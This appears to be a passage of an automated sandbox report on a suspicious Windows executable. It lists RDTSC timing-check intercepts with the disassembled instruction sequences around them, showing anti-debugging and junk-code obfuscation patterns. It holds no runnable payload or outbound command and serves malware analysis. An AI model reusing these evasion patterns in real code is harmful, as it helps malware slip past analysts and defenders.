                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6ABFCF second address: 6ABFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6ABFD5 second address: 6ABFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6ABFD9 second address: 6ABFDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6ABFDF second address: 6AC006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3A4D6CBA6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FD3A4D6CB96h 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AC006 second address: 6AC01C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3A47FEE90h 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AC5BB second address: 6AC5C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AC5C1 second address: 6AC5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AC5C5 second address: 6AC5CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AC5CB second address: 6AC5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AC5D5 second address: 6AC5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AC5D9 second address: 6AC5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AC822 second address: 6AC852 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3A4D6CB96h 0x00000008 jmp 00007FD3A4D6CB9Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FD3A4D6CBACh 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AC852 second address: 6AC85A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AC85A second address: 6AC85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6ACB2A second address: 6ACB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A47FEE8Ch 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6A4E7D second address: 6A4EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A4D6CBA0h 0x00000009 jmp 00007FD3A4D6CB9Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6A4EA3 second address: 6A4EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6ACF9F second address: 6ACFAB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD3A4D6CB96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6ACFAB second address: 6ACFD3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FD3A47FEE99h 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6ACFD3 second address: 6ACFE0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3A4D6CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6ACFE0 second address: 6ACFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6AD9C2 second address: 6AD9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD3A4D6CBA3h 0x0000000f pop edi 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6B2134 second address: 6B213E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3A47FEE86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6B213E second address: 6B2144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6B2144 second address: 6B2156 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD3A47FEE86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6B2156 second address: 6B215B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6B3718 second address: 6B371C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6B371C second address: 6B3724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 677BA8 second address: 677BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 677BB0 second address: 677BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 677BB4 second address: 677BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6B760C second address: 6B7612 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 680181 second address: 680187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BAEFF second address: 6BAF13 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD3A4D6CB9Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BB03E second address: 6BB04C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD3A47FEE8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BB2F5 second address: 6BB2FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BB2FB second address: 6BB2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BB5EA second address: 6BB5EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 672BC3 second address: 672BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD3A47FEE86h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BDC60 second address: 6BDC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BDC64 second address: 6BDC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FD3A47FEE91h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BDC90 second address: 6BDC95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BDC95 second address: 6BDC9A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BE49B second address: 6BE4A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BE4A1 second address: 6BE4A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6BEE50 second address: 6BEE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C0B1A second address: 6C0B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C0210 second address: 6C0214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C0B1F second address: 6C0B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C0214 second address: 6C0234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C0B25 second address: 6C0B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FD3A47FEE86h 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C0234 second address: 6C0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C0238 second address: 6C0255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C1626 second address: 6C1677 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD3A4D6CBA5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub esi, dword ptr [ebp+122D37E1h] 0x00000011 push 00000000h 0x00000013 cld 0x00000014 push 00000000h 0x00000016 sub esi, dword ptr [ebp+122D3323h] 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FD3A4D6CBA4h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push edi 0x00000027 pop edi 0x00000028 jmp 00007FD3A4D6CB9Ah 0x0000002d popad 0x0000002e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C1677 second address: 6C1681 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD3A47FEE8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C13FD second address: 6C1408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD3A4D6CB96h 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C1408 second address: 6C140D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C3662 second address: 6C366F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3A4D6CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C366F second address: 6C36C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A47FEE8Bh 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c stc 0x0000000d push 00000000h 0x0000000f pushad 0x00000010 jg 00007FD3A47FEE8Ch 0x00000016 sub dword ptr [ebp+122D1B97h], edi 0x0000001c popad 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FD3A47FEE88h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jne 00007FD3A47FEE86h 0x00000043 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C5D58 second address: 6C5D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CDC96 second address: 6CDC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CDC9B second address: 6CDCA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FD3A4D6CB96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CEBC0 second address: 6CEBDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CEBDA second address: 6CEC01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007FD3A4D6CBA8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CEC01 second address: 6CEC05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C3427 second address: 6C342D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D1C05 second address: 6D1C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD3A47FEE86h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D1C0F second address: 6D1C8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e adc ebx, 63C97F11h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FD3A4D6CB98h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 cmc 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FD3A4D6CB98h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d sub ebx, dword ptr [ebp+122D3681h] 0x00000053 push eax 0x00000054 jo 00007FD3A4D6CBA4h 0x0000005a push eax 0x0000005b push edx 0x0000005c push edi 0x0000005d pop edi 0x0000005e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D2C65 second address: 6D2C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D4BF1 second address: 6D4BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D4BF6 second address: 6D4BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CCD8A second address: 6CCD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CCD8E second address: 6CCDA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CEDAD second address: 6CEDB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D89FE second address: 6D8A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD3A47FEE86h 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D8A09 second address: 6D8A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D8A0E second address: 6D8A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FD3A47FEE88h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 cld 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+1245987Bh], esi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FD3A47FEE88h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b mov bx, dx 0x0000004e xchg eax, esi 0x0000004f jc 00007FD3A47FEE92h 0x00000055 jns 00007FD3A47FEE8Ch 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FD3A47FEE98h 0x00000063 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D8A93 second address: 6D8A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D8A99 second address: 6D8A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CEDB1 second address: 6CEE58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FD3A4D6CB98h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 add dword ptr [ebp+122D2B9Ah], edx 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jbe 00007FD3A4D6CB9Ch 0x00000039 mov edi, dword ptr [ebp+122D3685h] 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007FD3A4D6CB98h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 00000014h 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 mov dword ptr [ebp+1248BF04h], edx 0x00000066 add dword ptr [ebp+122D18B7h], esi 0x0000006c mov eax, dword ptr [ebp+122D1391h] 0x00000072 pushad 0x00000073 xor dword ptr [ebp+122D34B4h], esi 0x00000079 popad 0x0000007a push FFFFFFFFh 0x0000007c mov edi, ecx 0x0000007e push eax 0x0000007f jl 00007FD3A4D6CBA0h 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CFD8B second address: 6CFD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FD3A47FEE88h 0x0000000d rdtsc
